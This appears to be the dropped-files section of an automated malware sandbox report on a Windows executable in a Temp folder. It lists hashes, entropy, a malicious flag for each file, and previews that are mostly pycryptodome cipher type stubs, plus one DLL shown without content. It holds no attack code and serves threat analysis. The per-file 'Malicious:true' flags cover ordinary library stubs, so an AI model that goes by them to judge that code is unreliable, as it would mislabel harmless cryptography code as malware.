                                                                                                                                            MD5:81C7899ED070F1D26338977374A4B853
                                                                                                                                            SHA1:2627B47DA19BB2F2B8E7D25A5A57473C00C86550
                                                                                                                                            SHA-256:CA7D073C74998CFFB501A2E6E1C99AF62F49272A5FDFB3527769E2A632DFE1A0
                                                                                                                                            SHA-512:CF5299A774C61A0F84D6E1E4233F426CC9D854D809EEF0D6B1158EC0078E75C54C3141E835DC3D0F376B53EFB8DDE462B49B0A5093C63613B332617966F34D0C
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Union, Optional....Buffer = Union[bytes, bytearray, memoryview]....def strxor(term1: bytes, term2: bytes, output: Optional[Buffer]=...) -> bytes: .....def strxor_c(term: bytes, c: int, output: Optional[Buffer]=...) -> bytes: .....
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):208
                                                                                                                                            Entropy (8bit):4.7386324675372125
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:F//aNH4eH8u95/n23d6p9ArMDUIaatqtVnkPtkml:R/aRbH8g/2IphtaatqtqPWS
                                                                                                                                            MD5:CA93D6F66177D6E84FBA147B4CA98DF9
                                                                                                                                            SHA1:767E47159CE6EEE44BD220E329BFD013323B574B
                                                                                                                                            SHA-256:D12A9843A6FF7F9B4833EC67C95208052E2973583526844BB101B63442A1EF64
                                                                                                                                            SHA-512:602408DF9AAC942F368B280D20A389DECE85EC4BF87CEC8926AA84D26523095D28B112353E823B027418538812721AB3B779F59CB16E494EFB15C558629CCFED
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:..........xg................................d.S.).N..r..........cC:\Users\Administrator\AppData\Local\Programs\Python\Python311\Lib\site-packages\Crypto\__init__.py..<module>r........s...................r....
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):103
                                                                                                                                            Entropy (8bit):4.320003818965119
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:1REvgBk8J0fWQLCfcJAOLRL+2MliHovcoFQy:1REYBb0fWpcFY2MtJN
                                                                                                                                            MD5:BF77DB2C18C7E4E3E80EA7D09C2D8336
                                                                                                                                            SHA1:682ADC1869A615EBC5152E303D7F10C9DF4800C1
                                                                                                                                            SHA-256:748D33339311187C619DF8EAA40C8F1A8B4A4EB3E59DE4CDD90FA30105CD8351
                                                                                                                                            SHA-512:ADD512240AB6D99FF0B4871C7F96849267CCB8CD5BE8BAB86579D5599434266F1C4C290DF395526C694110BDD67DCDA6970CEF39416AB87798AC78914AD87EB7
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Tuple, Union....version_info : Tuple[int, int, Union[int, str]]..__version__ : str..
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):8726
                                                                                                                                            Entropy (8bit):5.534630062231483
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:he65nM89EXr/NjsHXk/y+ItPdZ9QjLslFdgggy/o:h/9GVhGtPFQjLslFTo
                                                                                                                                            MD5:70445883CD770492F07604AD054703D4
                                                                                                                                            SHA1:6F190E13E703A64F54D1FCE7DCF72F4A77B74C29
                                                                                                                                            SHA-256:0B518E1BB4EB3DA21ADDC8E7FDBAC762059508B947E63C2302C4E21F7EF962A3
                                                                                                                                            SHA-512:66ABEA2D11DB3678055550FB73D4AD32539038D540E25F45E1EDBBFAF2040FBDF04440BCF932A04FFF93CA83E4E7752831C9641A12E9C75F24781287DB615BD1
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e.#........................,.....d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z...e.d.e...............Z...d.Z...e.j.......................r ..e.d.e.......................d.d.............................Z.n.#.e.$.r...Y.n.w.x.Y.w.d...Z.d...Z.d...Z d.Z!d.Z"d.S.)......N)..._create_cipher)...load_pycryptodome_raw_lib..VoidPointer..SmartPointer..c_size_t..c_uint8_ptr)..._cpu_features)...get_random_bytes.......................................................a..... int AES_start_operation(const uint8_t key[],. size_t key_len,. void **pResult);. int AES_encrypt(const void *state,. const uint8_t *in,. uint8_t *out,. size_t data_len);. int AES_decrypt(const void *state,. const uint8_t *in,. uint8_t *out,.
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):3819
                                                                                                                                            Entropy (8bit):4.806572670333257
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:5FYAgGWG6WcWUjmKokLSL0jcj9yYFtpZuObl9gbiYbwJbzk:58ZoUW0jcj9yYFtpZuObfgbiYbwJbzk
                                                                                                                                            MD5:39C62D7749149CEFCA56CD8924566FCE
                                                                                                                                            SHA1:354C63D5279D521E27C6AE448E3161812B5FD46E
                                                                                                                                            SHA-256:880C7604F5F9CBEAEE58E411F15880F0908F1A276F1E0B7817A6F9ECE8513FDB
                                                                                                                                            SHA-512:009CC6DEC9ACA8000038449669B6023935010F0D8B365018516A4BD870C51073591E9E3B0A91DD251F9196865BA946D4B08E6F65AB4CAC8097E2B0AD8329DA80
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Dict, Optional, Tuple, Union, overload..from typing_extensions import Literal....Buffer=bytes|bytearray|memoryview....from Cryptodome.Cipher._mode_ecb import EcbMode..from Cryptodome.Cipher._mode_cbc import CbcMode..from Cryptodome.Cipher._mode_cfb import CfbMode..from Cryptodome.Cipher._mode_ofb import OfbMode..from Cryptodome.Cipher._mode_ctr import CtrMode..from Cryptodome.Cipher._mode_openpgp import OpenPgpMode..from Cryptodome.Cipher._mode_ccm import CcmMode..from Cryptodome.Cipher._mode_eax import EaxMode..from Cryptodome.Cipher._mode_gcm import GcmMode..from Cryptodome.Cipher._mode_siv import SivMode..from Cryptodome.Cipher._mode_ocb import OcbMode....MODE_ECB: Literal[1]..MODE_CBC: Literal[2]..MODE_CFB: Literal[3]..MODE_OFB: Literal[5]..MODE_CTR: Literal[6]..MODE_OPENPGP: Literal[7]..MODE_CCM: Literal[8]..MODE_EAX: Literal[9]..MODE_SIV: Literal[10]..MODE_GCM: Literal[11]..MODE_OCB: Literal[12]....# MODE_ECB..@overload..def new(key: Buffer,.. mode: Lite
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1048
                                                                                                                                            Entropy (8bit):4.936743654874026
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:1RENAAI1QJSzJSVJuJSpJQlJdvpB+yE2x/NEo0EDNqDNMN3zb1DoeRHYO:K+1AgGWG6xx9GIJqJejbFoeR4O
                                                                                                                                            MD5:ABC0C75BDCA256568739E75069C630CF
                                                                                                                                            SHA1:997D0DF67289A92CE181B9906C27EEBC96614021
                                                                                                                                            SHA-256:C724C1EB1442CAEEE70643125D96DE0A7793A2E8470775E5D1E7628FCA67AF82
                                                                                                                                            SHA-512:0E2729C803A2143AC70A26FD2D69067E8DA974BA56140326C71DAA3DF87286BB2E30C1C9A35BA4BACDDE7BFA34339F3B6EBD03150376A799CC9FC47FDCD79E6D
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Union, Dict, Iterable, Optional....Buffer = bytes|bytearray|memoryview....from Cryptodome.Cipher._mode_ecb import EcbMode..from Cryptodome.Cipher._mode_cbc import CbcMode..from Cryptodome.Cipher._mode_cfb import CfbMode..from Cryptodome.Cipher._mode_ofb import OfbMode..from Cryptodome.Cipher._mode_ctr import CtrMode..from Cryptodome.Cipher._mode_openpgp import OpenPgpMode..from Cryptodome.Cipher._mode_eax import EaxMode....ARC2Mode = int....MODE_ECB: ARC2Mode..MODE_CBC: ARC2Mode..MODE_CFB: ARC2Mode..MODE_OFB: ARC2Mode..MODE_CTR: ARC2Mode..MODE_OPENPGP: ARC2Mode..MODE_EAX: ARC2Mode....def new(key: Buffer,.. mode: ARC2Mode,.. iv : Optional[Buffer] = ...,.. IV : Optional[Buffer] = ...,.. nonce : Optional[Buffer] = ...,.. segment_size : int = ...,.. mac_len : int = ...,.. initial_value : Union[int, Buffer] = ...,.. counter : Dict = ...) -> \.. Union[EcbMode, CbcMode, CfbMode, OfbMode, CtrMode, OpenPgpMode]: .
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):438
                                                                                                                                            Entropy (8bit):4.892911336139007
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:1REYBdHgMJjWrMRyDWeXRyc1APyMFq6R5wnZ0R5AomWL7Ry/O:1REUAIWrQFeBFAfnRe+RGorVYO
                                                                                                                                            MD5:F00CD9D3130AA368D5F1F10B93E0A612
                                                                                                                                            SHA1:E9C27B3918320183E7366BD1D1294B48EAC93378
                                                                                                                                            SHA-256:28855BC2FF6531EFD40C42075EB5E506AD8A5F8D98B8041FB218725C7C484054
                                                                                                                                            SHA-512:228840E70CD9FAD2CB8EA202BD45931614A9E26C619ECDBC017E832B3588C85B0BBA97B762A804DB16BE3D19481B1CC17AB616FE66D46FD66DCB38B132D2994A
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Any, Union, Iterable....Buffer = bytes|bytearray|memoryview....class ARC4Cipher:.. block_size: int.. key_size: int.... def __init__(self, key: Buffer, *args: Any, **kwargs: Any) -> None: ..... def encrypt(self, plaintext: Buffer) -> bytes: ..... def decrypt(self, ciphertext: Buffer) -> bytes: .......def new(key: Buffer, drop : int = ...) -> ARC4Cipher: .......block_size: int..key_size: Iterable[int]..
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1084
                                                                                                                                            Entropy (8bit):4.920066075942964
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:1RENAAI1QJSzJSVJuJSpJQlJRvEStrF+olDNqDNMN3zb1DoeRHYO:K+1AgGWG6ltrF+wJqJejbFoeR4O
                                                                                                                                            MD5:D0AED6A00929EE2C6DA6B409C012F5E2
                                                                                                                                            SHA1:375CD151B552CA99011FF97581DD04BD33517FED
                                                                                                                                            SHA-256:A363EF5A112333F407470A884E23357F1C251FE733091B95DC8E86AE3FF73A6D
                                                                                                                                            SHA-512:147F1DE6BE32E1FCB88FFB0D37B765F5303CF2E7586CD405283FABD97A4D6714F011FDEE4A87B4777253BA41EC50C2A19D9DDACBB61C77E501D34D9999D55D08
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Union, Dict, Iterable, Optional....Buffer = bytes|bytearray|memoryview....from Cryptodome.Cipher._mode_ecb import EcbMode..from Cryptodome.Cipher._mode_cbc import CbcMode..from Cryptodome.Cipher._mode_cfb import CfbMode..from Cryptodome.Cipher._mode_ofb import OfbMode..from Cryptodome.Cipher._mode_ctr import CtrMode..from Cryptodome.Cipher._mode_openpgp import OpenPgpMode..from Cryptodome.Cipher._mode_eax import EaxMode....BlowfishMode = int....MODE_ECB: BlowfishMode..MODE_CBC: BlowfishMode..MODE_CFB: BlowfishMode..MODE_OFB: BlowfishMode..MODE_CTR: BlowfishMode..MODE_OPENPGP: BlowfishMode..MODE_EAX: BlowfishMode....def new(key: Buffer,.. mode: BlowfishMode,.. iv : Optional[Buffer] = ...,.. IV : Optional[Buffer] = ...,.. nonce : Optional[Buffer] = ...,.. segment_size : int = ...,.. mac_len : int = ...,.. initial_value : Union[int, Buffer] = ...,.. counter : Dict = ...) -> \.. Union[EcbMode, CbcMode, CfbMod
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1049
                                                                                                                                            Entropy (8bit):4.934689035797648
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:1RENAAI1QJSzJSVJuJSpJQlJFivieL/tixsDOIosswDNqDNMN3zb1DoeRHYg3:K+1AgGWG6FQieL/tixsDOIYwJqJejbFF
                                                                                                                                            MD5:BD0C5452D0C862F46720CDFB944FA7BC
                                                                                                                                            SHA1:917D4020DBD2D124BAA89750FE347739BBF11D1B
                                                                                                                                            SHA-256:1469D7505976C0A27F8B23F64E402BE8A897B00898539B5BB6803792178DFE1D
                                                                                                                                            SHA-512:3143965EDF0205A84B28C34BA7F0EF005440D0F3EE431C06BC70E5FD09CEA0F0C2FF3C4C6E238D4628DB0AB1BE206DB60A4C76AD48B26B2FB3BEDDE2B1B81CCD
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Union, Dict, Iterable, Optional....Buffer = bytes|bytearray|memoryview....from Cryptodome.Cipher._mode_ecb import EcbMode..from Cryptodome.Cipher._mode_cbc import CbcMode..from Cryptodome.Cipher._mode_cfb import CfbMode..from Cryptodome.Cipher._mode_ofb import OfbMode..from Cryptodome.Cipher._mode_ctr import CtrMode..from Cryptodome.Cipher._mode_openpgp import OpenPgpMode..from Cryptodome.Cipher._mode_eax import EaxMode....CASTMode = int....MODE_ECB: CASTMode..MODE_CBC: CASTMode..MODE_CFB: CASTMode..MODE_OFB: CASTMode..MODE_CTR: CASTMode..MODE_OPENPGP: CASTMode..MODE_EAX: CASTMode....def new(key: Buffer,.. mode: CASTMode,.. iv : Optional[Buffer] = ...,.. IV : Optional[Buffer] = ...,.. nonce : Optional[Buffer] = ...,.. segment_size : int = ...,.. mac_len : int = ...,.. initial_value : Union[int, Buffer] = ...,.. counter : Dict = ...) -> \.. Union[EcbMode, CbcMode, CfbMode, OfbMode, CtrMode, OpenPgpMode]: .
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):798
                                                                                                                                            Entropy (8bit):4.852768717173627
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:1RE2AIM/sxQUADnRNne3yFnR3Fne3xodgxVYBy:3Me/4vesLehx+w
                                                                                                                                            MD5:7311A085F06CFB4AF892363A4CB21E0E
                                                                                                                                            SHA1:5DF2EEAE8BFD1978BE23CCDD2ECD712CFB79D6B1
                                                                                                                                            SHA-256:CE31A7182E4369DC8F65D929813CE67E7AFA67ECEED9821B124BBEAB13D9E668
                                                                                                                                            SHA-512:B6332CFB639FCF28701DF645276F21EA8535E6B401FDB6162E0F397B74FDBF47CECC10EE8B400278F268EBDAA1FF4C5A824BA408A03BE9A9CB9ADC167F61CA87
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Union, overload, Optional....Buffer = bytes|bytearray|memoryview....def _HChaCha20(key: Buffer, nonce: Buffer) -> bytearray: .......class ChaCha20Cipher:.. block_size: int.. nonce: bytes.... def __init__(self, key: Buffer, nonce: Buffer) -> None: ..... @overload.. def encrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def encrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... @overload.. def decrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def decrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... def seek(self, position: int) -> None: .......def new(key: Buffer, nonce: Optional[Buffer] = ...) -> ChaCha20Cipher: .......block_size: int..key_size: int..
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1107
                                                                                                                                            Entropy (8bit):4.862920256864568
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:1RElsAIfUA0nRNne3yFnR3Fne3TP/Wwn90nf5GodLVYBy:tfUJvesLeiwanoo+w
                                                                                                                                            MD5:DED98A1B5B497FB5816021E8B6E5F6F4
                                                                                                                                            SHA1:977F227DD05557AEDD8C40E653D74AEAF3734A43
                                                                                                                                            SHA-256:6D880A3628C47D9BCE851019C82720D570F44699E1B453AF432AE4A7B20A1273
                                                                                                                                            SHA-512:C6494CE19133C645285D7ACA56AD2F0D9E978ED2C4C7BB58A9C90B095A360DA3881E0D6F308F3B01508A331CCBF070690543BAC826FF47E8F9153949D92D9EF4
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Union, Tuple, overload, Optional....Buffer = bytes|bytearray|memoryview....class ChaCha20Poly1305Cipher:.. nonce: bytes.... def __init__(self, key: Buffer, nonce: Buffer) -> None: ..... def update(self, data: Buffer) -> None: ..... @overload.. def encrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def encrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... @overload.. def decrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def decrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def verify(self, received_mac_tag: Buffer) -> None: ..... def hexverify(self, received_mac_tag: str) -> None: ..... def encrypt_and_digest(self, plaintext: Buffer) -> Tuple[bytes, bytes]: ..... def decrypt_and_verify(self, ciphertext: Buffer, received_mac_tag: Buffer) -> bytes: .......def new(key
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1029
                                                                                                                                            Entropy (8bit):4.895477988326694
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:1RENAAI1QJSzJSVJuJSpJQlJiiv7Hoc6iTD3IouwDNqDNMN3zb1DoeRHYBy:K+1AgGWG6N7XY6JqJejbFoeR4w
                                                                                                                                            MD5:F8300805D96A9983E023F2F7860C6E72
                                                                                                                                            SHA1:C80FDD36709906927D8355E2E937AB89E40A8C7C
                                                                                                                                            SHA-256:BFBAF8AEC79DFC45CB8C26053797A43735A7AACA50AA5504FE080E900A6A38E6
                                                                                                                                            SHA-512:32F47B45D4221E66CE58C49C2564C3DF40416C772C2958C1E374719DE3884945D48128704A18686A5491665B61817E592DC8626592F44064FEFCB649F0F10C71
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Union, Dict, Iterable, Optional....Buffer = bytes|bytearray|memoryview....from Cryptodome.Cipher._mode_ecb import EcbMode..from Cryptodome.Cipher._mode_cbc import CbcMode..from Cryptodome.Cipher._mode_cfb import CfbMode..from Cryptodome.Cipher._mode_ofb import OfbMode..from Cryptodome.Cipher._mode_ctr import CtrMode..from Cryptodome.Cipher._mode_openpgp import OpenPgpMode..from Cryptodome.Cipher._mode_eax import EaxMode....DESMode = int....MODE_ECB: DESMode..MODE_CBC: DESMode..MODE_CFB: DESMode..MODE_OFB: DESMode..MODE_CTR: DESMode..MODE_OPENPGP: DESMode..MODE_EAX: DESMode....def new(key: Buffer,.. mode: DESMode,.. iv : Optional[Buffer] = ...,.. IV : Optional[Buffer] = ...,.. nonce : Optional[Buffer] = ...,.. segment_size : int = ...,.. mac_len : int = ...,.. initial_value : Union[int, Buffer] = ...,.. counter : Dict = ...) -> \.. Union[EcbMode, CbcMode, CfbMode, OfbMode, CtrMode, OpenPgpMode]: .......blo
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1101
                                                                                                                                            Entropy (8bit):4.968068738679689
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:1RENbKAI1QJSzJSVJuJSpJQlJSNINSfWvOkDoEDNqDNMN3zb1DoeRHYX:KI1AgGWG6SGxOkDRJqJejbFoeR4X
                                                                                                                                            MD5:DC89ACAAEBEA0CE851FB522E37EF0ACE
                                                                                                                                            SHA1:0C497C6CD79E70AB8CAB26CE18727FAD20750A59
                                                                                                                                            SHA-256:3B868D2E9A2B41C27FCAC90E4C0DBAE1634F7198720805FF9F450C4C4D7CB57F
                                                                                                                                            SHA-512:99F7DBC1CACB3226D916CD744F9FA64787027DBEB39C500788663559D4DDFA985AD8BCF752ED7FC4F65C0499439E867AF9C9F156729D4E671BE4C32A8D036E70
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Union, Dict, Tuple, Optional....Buffer = bytes|bytearray|memoryview....from Cryptodome.Cipher._mode_ecb import EcbMode..from Cryptodome.Cipher._mode_cbc import CbcMode..from Cryptodome.Cipher._mode_cfb import CfbMode..from Cryptodome.Cipher._mode_ofb import OfbMode..from Cryptodome.Cipher._mode_ctr import CtrMode..from Cryptodome.Cipher._mode_openpgp import OpenPgpMode..from Cryptodome.Cipher._mode_eax import EaxMode....def adjust_key_parity(key_in: bytes) -> bytes: .......DES3Mode = int....MODE_ECB: DES3Mode..MODE_CBC: DES3Mode..MODE_CFB: DES3Mode..MODE_OFB: DES3Mode..MODE_CTR: DES3Mode..MODE_OPENPGP: DES3Mode..MODE_EAX: DES3Mode....def new(key: Buffer,.. mode: DES3Mode,.. iv : Optional[Buffer] = ...,.. IV : Optional[Buffer] = ...,.. nonce : Optional[Buffer] = ...,.. segment_size : int = ...,.. mac_len : int = ...,.. initial_value : Union[int, Buffer] = ...,.. counter : Dict = ...) -> \.. Union[EcbMode,
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1218
                                                                                                                                            Entropy (8bit):4.825103390769477
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:1REjQFC19js1zrhqMS8KDLYOT3OMIAl2HH8Myje+RGoziVEpvNtMEHo:gQFyw1IttDLteMI5aoJupVjHo
                                                                                                                                            MD5:D684C8F5065F2BE30D78895F52B3D3DE
                                                                                                                                            SHA1:9121E5BF5C9B1D9A4BA6BC83690DAB4181BB784A
                                                                                                                                            SHA-256:6A2570614ACE35D86E25EAB9F2AAAFD351B6B7FF85A9893556FB1A47524E099F
                                                                                                                                            SHA-512:ADF2D2B86EA419A696CFA5C30E274B9B116B7ED8577C64D91C31BEF21EBA8C30F8041ACE0BD134E43F5FC13E152D34554F741809A67A392631C894006685086B
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Optional, Union, Callable, Any, overload..from typing_extensions import Protocol....from Cryptodome.PublicKey.RSA import RsaKey....class HashLikeClass(Protocol):.. digest_size : int.. def new(self, data: Optional[bytes] = ...) -> Any: .......class HashLikeModule(Protocol):.. digest_size : int.. @staticmethod.. def new(data: Optional[bytes] = ...) -> Any: .......HashLike = Union[HashLikeClass, HashLikeModule]....Buffer = Union[bytes, bytearray, memoryview]....class PKCS1OAEP_Cipher:.. def __init__(self,.. key: RsaKey,.. hashAlgo: HashLike,.. mgfunc: Callable[[bytes, int], bytes],.. label: Buffer,.. randfunc: Callable[[int], bytes]) -> None: ..... def can_encrypt(self) -> bool: ..... def can_decrypt(self) -> bool: ..... def encrypt(self, message: Buffer) -> bytes: ..... def decrypt(self, ciphertext: Buffer) -> bytes: .......def new(key: RsaKey,.. hashAlg
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):710
                                                                                                                                            Entropy (8bit):4.7893819013663546
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:1REYB1mmNkUgBxpvIY3NwnNc1AlPcJZVyMnynj5wnZ03Rqqav+IAAozPmJifJEjJ:1REq7jspT3ENIAlUH8Myje+wqKozuMEt
                                                                                                                                            MD5:EFF76A3F67661BDE6D9D50BA8E67540F
                                                                                                                                            SHA1:989514DFB3236DC0D122B27B0430619967FEEBBA
                                                                                                                                            SHA-256:49DCC3570B0637BF76AFF4BB389AF7E1388AAD93CBFFBF9A1FEB7A3C12186ADF
                                                                                                                                            SHA-512:7C0D68FC3DEEA336C891632927C4E69EFF397EB4F2449642E8152C3B6B2AF0D077DE023234E3B31D1667AB35460361C79263A4C38C43EC647E188538D38CECBF
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Callable, Union, Any, Optional, TypeVar....from Cryptodome.PublicKey.RSA import RsaKey....Buffer = Union[bytes, bytearray, memoryview]..T = TypeVar('T')....class PKCS115_Cipher:.. def __init__(self,.. key: RsaKey,.. randfunc: Callable[[int], bytes]) -> None: ..... def can_encrypt(self) -> bool: ..... def can_decrypt(self) -> bool: ..... def encrypt(self, message: Buffer) -> bytes: ..... def decrypt(self, ciphertext: Buffer,.. sentinel: T,.. expected_pt_len: Optional[int] = ...) -> Union[bytes, T]: .......def new(key: RsaKey,.. randfunc: Optional[Callable[[int], bytes]] = ...) -> PKCS115_Cipher: .....
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):770
                                                                                                                                            Entropy (8bit):4.753367031924495
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:1RElTcAI4zFeBFAtnRNne3yFnR3Fne3rod8VYi:N4heryvesLe71+i
                                                                                                                                            MD5:F43BFBB1DE638F92162C8659DEFF5FCC
                                                                                                                                            SHA1:791719D6BDC25E30D7B0A7DB4AF08FF1A621A083
                                                                                                                                            SHA-256:EDCD33B9365AD546CF6B01C7FEFC73F1E7558BB50BFDB47FEF26212C2E027AE6
                                                                                                                                            SHA-512:1EEDEBCBCE99C19C2F489DDBD7B0C1B9020CBBC4A29C9E2E02AF3BA3FBECE0AB1E4F97BE2A62148F1E90B77B7B4AB88DAC847902BB984C7C4787D4B88D113B4B
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Union, Tuple, Optional, overload, Optional....Buffer = bytes|bytearray|memoryview....class Salsa20Cipher:.. nonce: bytes.. block_size: int.. key_size: int.... def __init__(self,.. key: Buffer,.. nonce: Buffer) -> None: ..... @overload.. def encrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def encrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... @overload.. def decrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def decrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: .......def new(key: Buffer, nonce: Optional[Buffer] = ...) -> Salsa20Cipher: .......block_size: int..key_size: Tuple[int, int]....
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):11264
                                                                                                                                            Entropy (8bit):4.704418348721006
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:nDzsc9VD9daQ2iTrqT+6Zdp/Q0I1uLfcC75JiC4Rs89EcYyGDj90OcX6gY/7ECFV:Dzs69damqTrpYTst0E5DjPcqgY/79X
                                                                                                                                            MD5:85F144F57905F68ECBF14552BAB2F070
                                                                                                                                            SHA1:83A20193E6229EA09DCCAE8890A74DBDD0A76373
                                                                                                                                            SHA-256:28696C8881D9C9272DE4E54ABE6760CD4C6CB22AD7E3FEABAF6FF313EC9A9EAF
                                                                                                                                            SHA-512:533EB4073594BFE97850DFF7353439BACD4E19539E247EE00D599F3468E162D2D88C5CA32322772538A73706DF9A6DD14553B35F47C686D2E20D915FAB766BDA
                                                                                                                                            Malicious:true
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4838
                                                                                                                                            Entropy (8bit):5.294649870739857
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:OawpXvaWWWa+aj9iivDDMqJBNp91+7moVH4ySS:OaHtjV3JN/1+7mQz
                                                                                                                                            MD5:8348CF2C1AE05C4C709D343A37B3364C
                                                                                                                                            SHA1:578F5EB429548A966FD75A75D97C67A36CE17EA8
                                                                                                                                            SHA-256:2B8B71A702EC673BF7686A2C5AA3CBC56114D492C97175ACDCBA3588E8A88D88
                                                                                                                                            SHA-512:A3008974614EFAA22B87917FC2DF9474D1A7E92CEE30EBF171A38D489A164708A9D843264021B3922ED54A991EF5C3D7D9168386A5131C11A07CDFD0076059CE
                                                                                                                                            Malicious:false
